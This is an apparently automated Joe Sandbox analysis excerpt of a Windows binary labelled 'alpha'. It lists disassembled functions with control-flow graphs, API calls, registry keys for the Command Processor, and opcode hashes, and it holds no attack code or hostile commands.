                                                                                          • Instruction Fuzzy Hash: 07F13E72A0AB83A6EB60DB21E4447BAB7E4FB89780F544136D94D83755DF3CE448EB00
                                                                                          Function 00007FF6A0E85554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 579 7ff6a0e85554-7ff6a0e855b9 call 7ff6a0e8a640 582 7ff6a0e855bc-7ff6a0e855e8 RegOpenKeyExW 579->582 583 7ff6a0e85887-7ff6a0e8588e 582->583 584 7ff6a0e855ee-7ff6a0e85631 RegQueryValueExW 582->584 583->582 587 7ff6a0e85894-7ff6a0e858db time srand call 7ff6a0e88f80 583->587 585 7ff6a0e85637-7ff6a0e85675 RegQueryValueExW 584->585 586 7ff6a0e8f248-7ff6a0e8f24d 584->586 590 7ff6a0e85677-7ff6a0e8567c 585->590 591 7ff6a0e8568e-7ff6a0e856cc RegQueryValueExW 585->591 588 7ff6a0e8f24f-7ff6a0e8f25b 586->588 589 7ff6a0e8f260-7ff6a0e8f265 586->589 588->585 589->585 593 7ff6a0e8f26b-7ff6a0e8f286 _wtol 589->593 594 7ff6a0e85682-7ff6a0e85687 590->594 595 7ff6a0e8f28b-7ff6a0e8f290 590->595 596 7ff6a0e8f2b6-7ff6a0e8f2bb 591->596 597 7ff6a0e856d2-7ff6a0e85710 RegQueryValueExW 591->597 593->585 594->591 595->591 599 7ff6a0e8f296-7ff6a0e8f2b1 _wtol 595->599 600 7ff6a0e8f2ce-7ff6a0e8f2d3 596->600 601 7ff6a0e8f2bd-7ff6a0e8f2c9 596->601 602 7ff6a0e85729-7ff6a0e85767 RegQueryValueExW 597->602 603 7ff6a0e85712-7ff6a0e85717 597->603 599->591 600->597 606 7ff6a0e8f2d9-7ff6a0e8f2f4 _wtol 600->606 601->597 604 7ff6a0e85769-7ff6a0e8576e 602->604 605 7ff6a0e8579f-7ff6a0e857dd RegQueryValueExW 602->605 607 7ff6a0e8571d-7ff6a0e85722 603->607 608 7ff6a0e8f2f9-7ff6a0e8f2fe 603->608 609 7ff6a0e8f320-7ff6a0e8f325 604->609 610 7ff6a0e85774-7ff6a0e8578f 604->610 611 7ff6a0e857e3-7ff6a0e857e8 605->611 612 7ff6a0e8f3a9 605->612 606->597 607->602 608->602 613 7ff6a0e8f304-7ff6a0e8f31a wcstol 608->613 618 7ff6a0e8f327-7ff6a0e8f33f wcstol 609->618 619 7ff6a0e8f34b 609->619 614 7ff6a0e85795-7ff6a0e85799 610->614 615 7ff6a0e8f357-7ff6a0e8f35e 610->615 616 7ff6a0e8f363-7ff6a0e8f368 611->616 617 7ff6a0e857ee-7ff6a0e85809 611->617 624 7ff6a0e8f3b5-7ff6a0e8f3b8 612->624 613->609 614->605 614->615 615->605 620 7ff6a0e8f38e 616->620 621 7ff6a0e8f36a-7ff6a0e8f382 wcstol 616->621 622 7ff6a0e8f39a-7ff6a0e8f39d 617->622 623 7ff6a0e8580f-7ff6a0e85813 617->623 618->619 619->615 620->622 621->620 622->612 623->622 625 7ff6a0e85819-7ff6a0e85823 623->625 626 7ff6a0e8f3be-7ff6a0e8f3c5 624->626 627 7ff6a0e8582c 624->627 625->624 628 7ff6a0e85829 625->628 629 7ff6a0e85832-7ff6a0e85870 RegQueryValueExW 626->629 627->629 630 7ff6a0e8f3ca-7ff6a0e8f3d1 627->630 628->627 631 7ff6a0e85876-7ff6a0e85882 RegCloseKey 629->631 632 7ff6a0e8f3dd-7ff6a0e8f3e2 629->632 630->632 631->583 633 7ff6a0e8f433-7ff6a0e8f439 632->633 634 7ff6a0e8f3e4-7ff6a0e8f412 ExpandEnvironmentStringsW 632->634 633->631 637 7ff6a0e8f43f-7ff6a0e8f44c call 7ff6a0e7b900 633->637 635 7ff6a0e8f414-7ff6a0e8f426 call 7ff6a0e813e0 634->635 636 7ff6a0e8f428 634->636 639 7ff6a0e8f42e 635->639 636->639 637->631 639->633
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue$CloseOpensrandtime
                                                                                          • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                          • API String ID: 145004033-3846321370
                                                                                          • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                          • Instruction ID: dd2d415f5053c54afd40c8c787a3dc5f3a3acde9204612535fdafece7548fd6f
                                                                                          • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                          • Instruction Fuzzy Hash: 65E1763291EA83E6E7508F10E45057AB7B0FB89745F505536FA8E82B58DF7CD548EB00
                                                                                          Function 00007FF6A0E837D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 821 7ff6a0e837d8-7ff6a0e83887 GetCurrentThreadId OpenThread call 7ff6a0e804f4 HeapSetInformation RegOpenKeyExW 824 7ff6a0e8388d-7ff6a0e838eb call 7ff6a0e85920 GetConsoleOutputCP GetCPInfo 821->824 825 7ff6a0e8e9f8-7ff6a0e8ea3b RegQueryValueExW RegCloseKey 821->825 828 7ff6a0e8ea41-7ff6a0e8ea59 GetThreadLocale 824->828 829 7ff6a0e838f1-7ff6a0e83913 memset 824->829 825->828 830 7ff6a0e8ea74-7ff6a0e8ea77 828->830 831 7ff6a0e8ea5b-7ff6a0e8ea67 828->831 832 7ff6a0e83919-7ff6a0e83935 call 7ff6a0e84d5c 829->832 833 7ff6a0e8eaa5 829->833 834 7ff6a0e8ea94-7ff6a0e8ea96 830->834 835 7ff6a0e8ea79-7ff6a0e8ea7d 830->835 831->830 841 7ff6a0e8393b-7ff6a0e83942 832->841 842 7ff6a0e8eae2-7ff6a0e8eaff call 7ff6a0e73240 call 7ff6a0e98530 call 7ff6a0e84c1c 832->842 838 7ff6a0e8eaa8-7ff6a0e8eab4 833->838 834->833 835->834 837 7ff6a0e8ea7f-7ff6a0e8ea89 835->837 837->834 838->832 840 7ff6a0e8eaba-7ff6a0e8eac3 838->840 843 7ff6a0e8eacb-7ff6a0e8eace 840->843 844 7ff6a0e83948-7ff6a0e83962 _setjmp 841->844 845 7ff6a0e8eb27-7ff6a0e8eb40 _setjmp 841->845 850 7ff6a0e8eb00-7ff6a0e8eb0d 842->850 846 7ff6a0e8ead0-7ff6a0e8eadb 843->846 847 7ff6a0e8eac5-7ff6a0e8eac9 843->847 844->850 851 7ff6a0e83968-7ff6a0e8396d 844->851 852 7ff6a0e8eb46-7ff6a0e8eb49 845->852 853 7ff6a0e839fe-7ff6a0e83a05 call 7ff6a0e84c1c 845->853 846->838 854 7ff6a0e8eadd 846->854 847->843 863 7ff6a0e8eb15-7ff6a0e8eb1f call 7ff6a0e84c1c 850->863 856 7ff6a0e839b9-7ff6a0e839bb 851->856 857 7ff6a0e8396f 851->857 859 7ff6a0e8eb66-7ff6a0e8eb6f call 7ff6a0e801b8 852->859 860 7ff6a0e8eb4b-7ff6a0e8eb65 call 7ff6a0e73240 call 7ff6a0e98530 call 7ff6a0e84c1c 852->860 853->825 854->832 867 7ff6a0e8eb20 856->867 868 7ff6a0e839c1-7ff6a0e839c3 call 7ff6a0e84c1c 856->868 864 7ff6a0e83972-7ff6a0e8397d 857->864 880 7ff6a0e8eb71-7ff6a0e8eb82 _setmode 859->880 881 7ff6a0e8eb87-7ff6a0e8eb89 call 7ff6a0e886f0 859->881 860->859 863->867 873 7ff6a0e839c9-7ff6a0e839de call 7ff6a0e7df60 864->873 874 7ff6a0e8397f-7ff6a0e83984 864->874 867->845 877 7ff6a0e839c8 868->877 873->863 889 7ff6a0e839e4-7ff6a0e839e8 873->889 874->864 883 7ff6a0e83986-7ff6a0e839ae call 7ff6a0e80580 GetConsoleOutputCP GetCPInfo call 7ff6a0e804f4 874->883 877->873 880->881 890 7ff6a0e8eb8e-7ff6a0e8ebad call 7ff6a0e858e4 call 7ff6a0e7df60 881->890 898 7ff6a0e839b3 883->898 889->853 893 7ff6a0e839ea-7ff6a0e839ef call 7ff6a0e7be00 889->893 902 7ff6a0e8ebaf-7ff6a0e8ebb3 890->902 899 7ff6a0e839f4-7ff6a0e839fc 893->899 898->856 899->874 902->853 903 7ff6a0e8ebb9-7ff6a0e8ec24 call 7ff6a0e858e4 GetConsoleOutputCP GetCPInfo call 7ff6a0e804f4 call 7ff6a0e7be00 call 7ff6a0e80580 GetConsoleOutputCP GetCPInfo call 7ff6a0e804f4 902->903 903->890
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                          • API String ID: 2624720099-1920437939
                                                                                          • Opcode ID: 0bf09e208e1b0c6bea64f33002f51ec0bb7d1cb9bc02841e8aeeb1d0e4bcf9a4
                                                                                          • Instruction ID: c786eafd111a8c63eec94746b35b16ada20bbfb6b08092003f3d44e5bcc1eff9
                                                                                          • Opcode Fuzzy Hash: 0bf09e208e1b0c6bea64f33002f51ec0bb7d1cb9bc02841e8aeeb1d0e4bcf9a4
                                                                                          • Instruction Fuzzy Hash: B5C1F131E0A783AAF7149B74A4501BD7AA0FF4A751F548139DA1ED77A6DF3CE448A300
                                                                                          Function 00007FF6A0E8823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1118 7ff6a0e8823c-7ff6a0e8829b FindFirstFileExW 1119 7ff6a0e882cd-7ff6a0e882df 1118->1119 1120 7ff6a0e8829d-7ff6a0e882a9 GetLastError 1118->1120 1124 7ff6a0e88365-7ff6a0e8837b FindNextFileW 1119->1124 1125 7ff6a0e882e5-7ff6a0e882ee 1119->1125 1121 7ff6a0e882af 1120->1121 1122 7ff6a0e882b1-7ff6a0e882cb 1121->1122 1126 7ff6a0e883d0-7ff6a0e883e5 FindClose 1124->1126 1127 7ff6a0e8837d-7ff6a0e88380 1124->1127 1128 7ff6a0e882f1-7ff6a0e882f4 1125->1128 1126->1128 1127->1119 1129 7ff6a0e88386 1127->1129 1130 7ff6a0e882f6-7ff6a0e88300 1128->1130 1131 7ff6a0e88329-7ff6a0e8832b 1128->1131 1129->1120 1133 7ff6a0e88332-7ff6a0e88353 GetProcessHeap HeapAlloc 1130->1133 1134 7ff6a0e88302-7ff6a0e8830e 1130->1134 1131->1121 1132 7ff6a0e8832d 1131->1132 1132->1120 1135 7ff6a0e88356-7ff6a0e88363 1133->1135 1136 7ff6a0e88310-7ff6a0e88313 1134->1136 1137 7ff6a0e8838b-7ff6a0e883c2 GetProcessHeap HeapReAlloc 1134->1137 1135->1136 1138 7ff6a0e88315-7ff6a0e88323 1136->1138 1139 7ff6a0e88327 1136->1139 1140 7ff6a0e950f8-7ff6a0e9511e GetLastError FindClose 1137->1140 1141 7ff6a0e883c8-7ff6a0e883ce 1137->1141 1138->1139 1139->1131 1140->1122 1141->1135
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileFindFirstLast
                                                                                          • String ID:
                                                                                          • API String ID: 873889042-0
                                                                                          • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                          • Instruction ID: 76166c059a0e4b6c045fe78a706f38366120d9a7e3cc253bfad90c1bdf02e995
                                                                                          • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                          • Instruction Fuzzy Hash: 5E514E76A0AB83E6E7108F11E944279BBB1FB8AB91F548131DE1D83361DF3CE454A700
                                                                                          Function 00007FF6A0E82978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1142 7ff6a0e82978-7ff6a0e829b6 1143 7ff6a0e829b9-7ff6a0e829c1 1142->1143 1143->1143 1144 7ff6a0e829c3-7ff6a0e829c5 1143->1144 1145 7ff6a0e829cb-7ff6a0e829cf 1144->1145 1146 7ff6a0e8e441 1144->1146 1147 7ff6a0e829d2-7ff6a0e829da 1145->1147 1148 7ff6a0e829dc-7ff6a0e829e1 1147->1148 1149 7ff6a0e82a1e-7ff6a0e82a3e FindFirstFileW 1147->1149 1148->1149 1150 7ff6a0e829e3-7ff6a0e829eb 1148->1150 1151 7ff6a0e8e435-7ff6a0e8e439 1149->1151 1152 7ff6a0e82a44-7ff6a0e82a5c FindClose 1149->1152 1150->1147 1153 7ff6a0e829ed-7ff6a0e82a1c call 7ff6a0e88f80 1150->1153 1151->1146 1154 7ff6a0e82ae3-7ff6a0e82ae5 1152->1154 1155 7ff6a0e82a62-7ff6a0e82a6e 1152->1155 1158 7ff6a0e82aeb-7ff6a0e82b10 _wcsnicmp 1154->1158 1159 7ff6a0e8e3f7-7ff6a0e8e3ff 1154->1159 1157 7ff6a0e82a70-7ff6a0e82a78 1155->1157 1157->1157 1162 7ff6a0e82a7a-7ff6a0e82a8d 1157->1162 1158->1155 1160 7ff6a0e82b16-7ff6a0e8e3f1 _wcsicmp 1158->1160 1160->1155 1160->1159 1162->1146 1164 7ff6a0e82a93-7ff6a0e82a97 1162->1164 1165 7ff6a0e82a9d-7ff6a0e82ade memmove call 7ff6a0e813e0 1164->1165 1166 7ff6a0e8e404-7ff6a0e8e407 1164->1166 1165->1150 1167 7ff6a0e8e40b-7ff6a0e8e413 1166->1167 1167->1167 1169 7ff6a0e8e415-7ff6a0e8e42b memmove 1167->1169 1169->1151
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                          • Instruction ID: a08bc8b71ebd25870bfc35215c9b3a460c066f3dd1fc8cf72c4975d465745b6c
                                                                                          • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                          • Instruction Fuzzy Hash: C8513731B0A683A5EB308F15A9542BAA2A0FF54BA4F484235DE6E877D0DF3CE449D300
                                                                                          Function 00007FF6A0E84D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 643 7ff6a0e84d5c-7ff6a0e84e4b InitializeCriticalSection call 7ff6a0e858e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff6a0e80580 call 7ff6a0e84a14 call 7ff6a0e84ad0 call 7ff6a0e85554 GetCommandLineW 654 7ff6a0e84e4d-7ff6a0e84e54 643->654 654->654 655 7ff6a0e84e56-7ff6a0e84e61 654->655 656 7ff6a0e84e67-7ff6a0e84e7b call 7ff6a0e82e44 655->656 657 7ff6a0e851cf-7ff6a0e851e3 call 7ff6a0e73278 call 7ff6a0e84c1c 655->657 662 7ff6a0e851ba-7ff6a0e851ce call 7ff6a0e73278 call 7ff6a0e84c1c 656->662 663 7ff6a0e84e81-7ff6a0e84ec3 GetCommandLineW call 7ff6a0e813e0 call 7ff6a0e7ca40 656->663 662->657 663->662 674 7ff6a0e84ec9-7ff6a0e84ee8 call 7ff6a0e8417c call 7ff6a0e82394 663->674 678 7ff6a0e84eed-7ff6a0e84ef5 674->678 678->678 679 7ff6a0e84ef7-7ff6a0e84f1f call 7ff6a0e7aa54 678->679 682 7ff6a0e84f95-7ff6a0e84fee GetConsoleOutputCP GetCPInfo call 7ff6a0e851ec GetProcessHeap HeapAlloc 679->682 683 7ff6a0e84f21-7ff6a0e84f30 679->683 689 7ff6a0e85012-7ff6a0e85018 682->689 690 7ff6a0e84ff0-7ff6a0e85006 GetConsoleTitleW 682->690 683->682 684 7ff6a0e84f32-7ff6a0e84f39 683->684 684->682 686 7ff6a0e84f3b-7ff6a0e84f77 call 7ff6a0e73278 GetWindowsDirectoryW 684->686 696 7ff6a0e84f7d-7ff6a0e84f90 call 7ff6a0e83c24 686->696 697 7ff6a0e851b1-7ff6a0e851b9 call 7ff6a0e84c1c 686->697 692 7ff6a0e8507a-7ff6a0e8507e 689->692 693 7ff6a0e8501a-7ff6a0e85024 call 7ff6a0e83578 689->693 690->689 691 7ff6a0e85008-7ff6a0e8500f 690->691 691->689 698 7ff6a0e850eb-7ff6a0e85161 GetModuleHandleW GetProcAddress * 3 692->698 699 7ff6a0e85080-7ff6a0e850b3 call 7ff6a0e9b89c call 7ff6a0e7586c call 7ff6a0e73240 call 7ff6a0e83448 692->699 693->692 707 7ff6a0e85026-7ff6a0e85030 693->707 696->682 697->662 704 7ff6a0e85163-7ff6a0e85167 698->704 705 7ff6a0e8516f 698->705 724 7ff6a0e850b5-7ff6a0e850d0 call 7ff6a0e83448 * 2 699->724 725 7ff6a0e850d2-7ff6a0e850d7 call 7ff6a0e73278 699->725 704->705 710 7ff6a0e85169-7ff6a0e8516d 704->710 706 7ff6a0e85172-7ff6a0e851af free call 7ff6a0e88f80 705->706 712 7ff6a0e85075 call 7ff6a0e9cff0 707->712 713 7ff6a0e85032-7ff6a0e85059 GetStdHandle GetConsoleScreenBufferInfo 707->713 710->705 710->706 712->692 717 7ff6a0e8505b-7ff6a0e85067 713->717 718 7ff6a0e85069-7ff6a0e85073 713->718 717->692 718->692 718->712 729 7ff6a0e850dc-7ff6a0e850e6 GlobalFree 724->729 725->729 729->698
                                                                                          APIs
                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84D9A
                                                                                            • Part of subcall function 00007FF6A0E858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6A0E9C6DB), ref: 00007FF6A0E858EF
                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84DBB
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E84DCA
                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84DE0
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E84DEE
                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84E04
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E80589
                                                                                            • Part of subcall function 00007FF6A0E80580: SetConsoleMode.KERNELBASE ref: 00007FF6A0E8059E
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E805AF
                                                                                            • Part of subcall function 00007FF6A0E80580: GetConsoleMode.KERNELBASE ref: 00007FF6A0E805C5
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E805EF
                                                                                            • Part of subcall function 00007FF6A0E80580: GetConsoleMode.KERNELBASE ref: 00007FF6A0E80605
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E80632
                                                                                            • Part of subcall function 00007FF6A0E80580: SetConsoleMode.KERNELBASE ref: 00007FF6A0E80647
                                                                                            • Part of subcall function 00007FF6A0E84A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A28
                                                                                            • Part of subcall function 00007FF6A0E84A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A66
                                                                                            • Part of subcall function 00007FF6A0E84A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A7D
                                                                                            • Part of subcall function 00007FF6A0E84A14: memmove.MSVCRT(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A9A
                                                                                            • Part of subcall function 00007FF6A0E84A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84AA2
                                                                                            • Part of subcall function 00007FF6A0E84AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E84AD6
                                                                                            • Part of subcall function 00007FF6A0E84AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E84AEF
                                                                                            • Part of subcall function 00007FF6A0E85554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF6A0E84E35), ref: 00007FF6A0E855DA
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E85623
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E85667
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E856BE
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E85702
                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84E35
                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84E81
                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84F69
                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84F95
                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FB0
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FC1
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FD8
                                                                                          • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FF8
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E85037
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E8504B
                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E850DF
                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E850F2
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E8510F
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E85130
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E8514A
                                                                                          • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E85175
                                                                                            • Part of subcall function 00007FF6A0E83578: _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
